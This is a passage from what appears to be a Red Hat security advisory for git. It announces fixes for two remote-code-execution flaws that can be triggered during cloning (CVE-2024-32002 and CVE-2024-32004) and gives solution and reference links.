possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32002References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2280421https://bugzilla.redhat.com/show_bug.cgi?id=2280428

Tag

#rce